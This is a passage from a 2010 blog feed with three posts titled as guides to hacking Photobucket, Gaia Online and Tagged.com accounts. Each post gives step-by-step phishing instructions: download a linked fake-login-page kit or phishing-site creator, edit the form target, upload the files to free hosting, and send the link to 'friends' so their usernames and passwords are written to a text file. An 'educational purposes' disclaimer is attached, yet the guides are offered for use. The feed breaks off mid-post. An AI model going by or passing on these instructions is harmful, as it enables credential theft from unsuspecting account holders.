xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-295646908396202843</id><published>2010-01-31T06:56:00.001-08:00</published><updated>2010-01-31T06:56:33.238-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Email hacking'/><title type='text'>how to hack someone's photobucket account.</title><content type='html'>&lt;a href="" id="AdBriteInlineAd_Learn" name="AdBriteInlineAd_Learn" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;Learn&lt;/a&gt; &lt;b&gt;how to hack  someone's photobucket account&lt;/b&gt;.&lt;br /&gt;I was receiving emails from last couple of days i was continously asked &lt;b&gt;How  to hack someone's photobucket account?&lt;/b&gt; or &lt;b&gt;How to hack  photobucket account&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href="" name="more"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.blogger.com/www.photobucket.com"&gt;Photobucket&lt;/a&gt; is  an image hosting, video hosting, slideshow creation and &lt;span class="IL_AD" id="IL_AD2"&gt;photo sharing website&lt;/span&gt;. It was founded  in 2003 by Alex Welch and Darren &lt;span class="IL_AD" id="IL_AD1"&gt;Crystal&lt;/span&gt;  and received funding from Trinity Ventures.[1][2] It was acquired by  Fox &lt;span class="IL_AD" id="IL_AD4"&gt;Interactive Media&lt;/span&gt; in 2007.&lt;br /&gt;Photobucket is usually used for personal &lt;span class="IL_AD" id="IL_AD5"&gt;photographic  albums&lt;/span&gt;, remote storage of avatars displayed on internet forums,  and storage of videos. Photobucket's image hosting is often used for  eBay, MySpace (now a corporate cousin), Bebo, Neopets and Facebook  accounts, LiveJournals, Open Diarys, or other &lt;span class="IL_AD" id="IL_AD7"&gt;blogs&lt;/span&gt;, and message boards. Users may keep their  albums private, allow password-protected guest access, or open them to  the public.&lt;br /&gt;&lt;br /&gt;As being the most popular image hosting site,it is being a target of  many hackers,so &lt;a href="" id="AdBriteInlineAd_today" name="AdBriteInlineAd_today" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;today&lt;/a&gt; i will tell you a  method &lt;b&gt;How to hack hack a photobucket account&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h1&gt;How to hack photobucket account - Method&lt;/h1&gt;&lt;br /&gt;There are two methods to&lt;b&gt; hack a photobucket accoun&lt;/b&gt;t:&lt;br /&gt;&lt;br /&gt;1.&lt;span style="color: #3d85c6;"&gt;&lt;b&gt;Phishing&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;2.&lt;span style="color: #3d85c6;"&gt;&lt;b&gt;Keylogging&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Today we i will tell you how to &lt;b&gt;hack a photobucket account&lt;/b&gt; with  phishing:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;What is phishing?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Phishing is the criminally fraudulent process of attempting to acquire  sensitive information such as usernames, passwords and &lt;span class="IL_AD" id="IL_AD3"&gt;credit card&lt;/span&gt; details by masquerading as a  trustworthy entity in an electronic communication. &lt;a href="" id="AdBriteInlineAd_Communications" name="AdBriteInlineAd_Communications" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;Communications&lt;/a&gt;  purporting to be from popular social web sites, auction sites, &lt;a href="" id="AdBriteInlineAd_online" name="AdBriteInlineAd_online" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;online&lt;/a&gt; payment processors  or IT administrators are commonly used to lure the unsuspecting  public,Phishing is one of the most easiest way to &lt;b&gt;hack someones  photobucket account&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt; Steps to hack a photobucket account using phisihng&lt;/b&gt;:&lt;br /&gt;&lt;span style="font-family: arial; font-size: 13px;"&gt;&lt;img align="middle" alt="http://www.chaaps.com/unlock-and-download-private-albums-on-photobucket.html" border="1" height="80" id="imgthumb1" src="data:image/jpg;base64,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" style="margin: 3px; padding: 7px 1px;" title="http://www.chaaps.com/unlock-and-download-private-albums-on-photobucket.html" width="118" /&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: arial; font-size: small;"&gt;&lt;span style="font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt; 1.First of all download:&lt;a href="http://www.ziddu.com/download/6897003/sherCodedbyRafay-rafayhackingarticles.blogspot.com.rar.html"&gt;Photobucket  fake login page&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;2.Now extract files into a folder&lt;br /&gt;&lt;br /&gt;3.Now open &lt;b&gt;index.htm&lt;/b&gt; in a wordpad &lt;br /&gt;&lt;br /&gt;4.Now search for a term &lt;b&gt;"form action="&lt;/b&gt; you will see something  like this action="&lt;b&gt;yourloginscript.php&lt;/b&gt;" &lt;br /&gt;&lt;br /&gt;5.Change this term to the name of your login script. i.e next.php or the  name of your &lt;b&gt;login script&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;6.Now save all changes&lt;br /&gt;&lt;br /&gt;7.Now make an account on a free hosting site such as ripway.com,t35.com  or 110mb and upload all the three files i.e index.htm,next.php and  passw0rds.txt&lt;br /&gt;&lt;br /&gt;8.Now check your fake login page by typing somewords in your photobucket  fake login page you will see those words in a file called passw0rds.txt&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h6&gt;Warning:This post &lt;b&gt;How to hack a photobucket account&lt;/b&gt; is truly  for educational purposes&lt;/h6&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-295646908396202843?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/295646908396202843/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/how-to-hack-someones-photobucket.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/295646908396202843'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/295646908396202843'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/how-to-hack-someones-photobucket.html' title='how to hack someone&apos;s photobucket account.'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-5498069595205549797</id><published>2010-01-31T06:54:00.000-08:00</published><updated>2010-01-31T06:54:32.843-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Email hacking'/><title type='text'>How to hack gaia online accounts:</title><content type='html'>Gaia Online is an English-language, anime-themed &lt;span class="IL_AD" id="IL_AD6"&gt;social networking&lt;/span&gt; and forums-based website. It was  founded in 2003 as Go-Gaia.com,[1][2] but the name was changed to  GaiaOnline.com in 2004 by its owner, Gaia &lt;span class="IL_AD" id="IL_AD5"&gt;Interactive&lt;/span&gt;.Gaia online has now become very famous  online hangout, incorporating social networking, forums, &lt;a href="" id="AdBriteInlineAd_gaming" name="AdBriteInlineAd_gaming" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;gaming&lt;/a&gt; and a virtual  world,therefore it has become target of &lt;a href="" id="AdBriteInlineAd_large" name="AdBriteInlineAd_large" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;large&lt;/a&gt; amount of hackers,in  this article i will tell you &lt;b&gt;How to hack gaia online accounts &lt;/b&gt;or&lt;b&gt;  Hacking gaia online account.&lt;/b&gt;&lt;br /&gt;The method &amp;nbsp;i will tell you has most&amp;nbsp;&lt;a href="" id="AdBriteInlineAd_success" name="AdBriteInlineAd_success" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;success&lt;/a&gt; rate than any  other method,the method is called phishing and it is the leading method  to &lt;span style="font-weight: bold;"&gt;hack gaia online accounts&lt;span style="font-weight: normal;"&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="" name="more"&gt;&lt;/a&gt;&lt;br /&gt;&lt;b&gt;Phishing:&lt;/b&gt;&lt;br /&gt;In the field of &lt;span class="IL_AD" id="IL_AD3"&gt;computer security&lt;/span&gt;,  phishing is the criminally fraudulent process of attempting to acquire  sensitive information such as usernames, passwords and &lt;span class="IL_AD" id="IL_AD2"&gt;credit card&lt;/span&gt; details by masquerading as a  trustworthy entity in an electronic communication.The most common  method used in phishing are &lt;a href="http://rafayhackingarticles.blogspot.com/2009/07/how-to-create-fake-login-page-for-any.html"&gt;&lt;b&gt;&lt;span style="color: #3d85c6;"&gt;Fake login pages&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;.On  this method the hacker creates a fake page which exactly resembles with  gaia.com,and when victim enters his/her password he gets his &lt;b&gt;gaia  account hacked&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rafayhackingarticles.blogspot.com/2009/08/identify-phising-scams.html"&gt;&lt;b&gt;&lt;span style="color: #3d85c6;"&gt;Know more about phishing:&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h1&gt;&lt;span style="font-size: x-large;"&gt;How to hack gaia online accounts:&lt;/span&gt;&lt;/h1&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"&gt;1.Download&amp;nbsp;&lt;b&gt;&lt;a href="http://www.blogger.com/goog_1260046981283"&gt;&lt;span style="color: #3d85c6;"&gt;G&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://www.blogger.com/goog_1260046981283"&gt;&lt;span style="color: #3d85c6;"&gt;aia&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://www.ocxdump.com/download-ocx-files_new.php/ocxfiles/M/MSINET.OCX/6.01.9782/download.html"&gt;&lt;span style="color: #3d85c6;"&gt;&amp;nbsp;Phishing site creato&lt;/span&gt;&lt;/a&gt;&lt;a href="http://www.ziddu.com/download/5010234/PhishcreateV2_by_techotips.blogspot.com.rar.html" style="text-decoration: none;"&gt;&lt;span style="color: #3d85c6;"&gt;r&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&amp;nbsp;software  to make a &amp;nbsp;gaiaonline.com phisher site&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"&gt;&lt;span style="font-size: 12px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"&gt;2.Now  extract all the contents into a folder&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"&gt;&lt;span style="font-size: 12px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"&gt;3.Now  you will have something like this:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"&gt;&lt;span style="font-size: 12px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"&gt;&lt;span style="font-size: 12px;"&gt;&lt;span style="font-family: Verdana,Arial,sans-serif; font-size: 13px;"&gt;&lt;img alt="[Image: creator2ua8.png]" border="0" height="400" src="http://img232.imageshack.us/img232/1450/creator2ua8.png" width="344" /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"&gt;&lt;span style="font-size: 12px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Verdana,sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: 12px;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;4.Just fill in&amp;nbsp;&lt;/span&gt;&lt;a class="linkification-ext" href="http://www.myspace.com/" style="color: #2b6690; text-decoration: none;" title="Linkification: http://www.myspace.com"&gt;&lt;b&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;w&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;ww.gaiaonline.com&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&amp;nbsp;in url field and provide the &lt;span class="IL_AD" id="IL_AD1"&gt;destination&lt;/span&gt; folder in which gaiaonline  should be saved. Just hit on "Create Phisher" to make &lt;/span&gt;&lt;b&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;gaia phishing site.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;5. You can also use "&lt;b&gt;Redirection  Url&lt;/b&gt;" to redirect victim to desired url after he logs in with our  gaiaonline phishing site.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #333333; font-family: Verdana,sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px; line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"&gt;&lt;span style="color: #333333; font-family: Verdana,sans-serif; line-height: 19px;"&gt;6.Now just Create an id in&amp;nbsp;&lt;span style="font-weight: bold;"&gt;&lt;a href="http://www.110mb.com/" style="color: #e1771e; text-decoration: none;"&gt;www.110mb.com&lt;/a&gt;,&lt;a href="http://www.ripway.com/" style="color: #e1771e; text-decoration: none;"&gt;www.ripway.com&lt;/a&gt;&amp;nbsp;or&amp;nbsp;&lt;a href="http://t35.com/" style="color: #e1771e; text-decoration: none;"&gt;t35.com&lt;/a&gt;&amp;nbsp;or  any other webhosting site&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"&gt;&lt;span style="color: #333333; font-family: Verdana,sans-serif; line-height: 19px;"&gt;6.Then upload the contents into a directory&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"&gt;&lt;span style="color: #333333; font-family: Verdana,sans-serif; line-height: 19px;"&gt;7.For that after creating an id you should go to  file manager and upload all these files.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"&gt;&lt;span style="color: #333333; font-family: Verdana,sans-serif; line-height: 19px;"&gt;8.Then just got to gaia.htm and try out whether its  working .&lt;br /&gt;After you type the file , a password file named pass.txt will be &lt;a href="" id="AdBriteInlineAd_created" name="AdBriteInlineAd_created" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;created&lt;/a&gt; in the same  directory .&lt;br /&gt;&amp;nbsp;you can see what username and password you have entered.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: Arial,Helvetica,sans-serif; font-size: 12px;"&gt;&lt;span style="color: #333333; font-family: Verdana,sans-serif; line-height: 19px;"&gt;9. Distribute the &lt;b&gt;gaia.HTML&lt;/b&gt; URL (ie: &lt;b&gt;yoursite.com/gaia.HTML&lt;/b&gt;)  to your friends.When they login from this fake login page, the  login.php will save the username and password onto the .TXT file (or any  other format) in your site. Download the file to see the password  inside it.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-5498069595205549797?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/5498069595205549797/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/how-to-hack-gaia-online-accounts.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/5498069595205549797'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/5498069595205549797'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/how-to-hack-gaia-online-accounts.html' title='How to hack gaia online accounts:'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-4326015239861154736</id><published>2010-01-31T06:50:00.000-08:00</published><updated>2010-01-31T06:50:31.472-08:00</updated><title type='text'>Hack Tagged.com password</title><content type='html'>&lt;div id="TixyyLink" style="background-color: transparent; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"&gt;&lt;span style="font-size: large;"&gt;Hack Tagged.com  password - Procedure:&lt;/span&gt;&lt;/div&gt;&lt;h1&gt;&lt;span style="font-size: small;"&gt;So,first  of all you gotta download the phisher that i uploaded !&lt;/span&gt;&lt;/h1&gt;&lt;b&gt;Download:&lt;a href="http://www.ziddu.com/downloadlink/8368587/FakeLoginTagged.rar" style="color: #3d85c6;"&gt;Tagged Fake Login Page&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;Password:&lt;span style="color: red;"&gt;rafayhackingarticles.blogspot.com &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;span style="font-weight: bold;"&gt;How to Install it ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1.First of all &lt;span style="font-weight: bold;"&gt;extract&lt;/span&gt; the files  that you downloaded&lt;br /&gt;&lt;br /&gt;2.You will see three files in it :&lt;span style="font-weight: bold;"&gt;  Login.php,Tagged.htm,LoginFrame.htm,LoginFrame2.htm&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;3.Now "&lt;span style="font-weight: bold;"&gt;Right Click&lt;/span&gt;" on &lt;span style="font-weight: bold;"&gt;LoginFrame2.htm&lt;/span&gt; and click on "&lt;span style="font-weight: bold;"&gt;Edit&lt;/span&gt;" or else &lt;span style="font-weight: bold;"&gt;Right Click &amp;gt; Open With &amp;gt; Notepad&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;4.Then you will find something like this:&lt;br /&gt;&lt;div id="TixyyLink" style="background-color: transparent; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;span style="color: white; font-weight: bold;"&gt;There has  been a temporary error Please &lt;/span&gt;Your Redirection URL (tagged.com)"  target="_blank"&amp;gt;Try Again&lt;/blockquote&gt;&lt;br /&gt;5.Now in default you will find "&lt;span style="font-weight: bold;"&gt;http://rafayhackingarticles.blogspot.com\&lt;/span&gt;"  instead of "&lt;span style="color: red;"&gt;&lt;b&gt;Your Redirection URL (tagged.com)&lt;/b&gt;"&lt;/span&gt;.So  make the changes and &lt;span style="font-weight: bold;"&gt;save&lt;/span&gt; the  file !&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;6.So,now your main objective is to&lt;span style="font-weight: bold;"&gt;  upload&lt;/span&gt; the files into a&lt;span style="font-weight: bold;"&gt; &lt;span class="IL_AD" id="IL_AD6"&gt;free file hosting&lt;/span&gt; server&lt;/span&gt; like &lt;a href="http://110mb.com/" target="_blank"&gt;www.110mb.com&lt;/a&gt; , &lt;a href="http://t35.com/" target="_blank"&gt;www.t35.com&lt;/a&gt;,&lt;a href="http://ripway.com/" target="_blank"&gt;www.ripway.com&lt;/a&gt;&lt;br /&gt;&lt;br 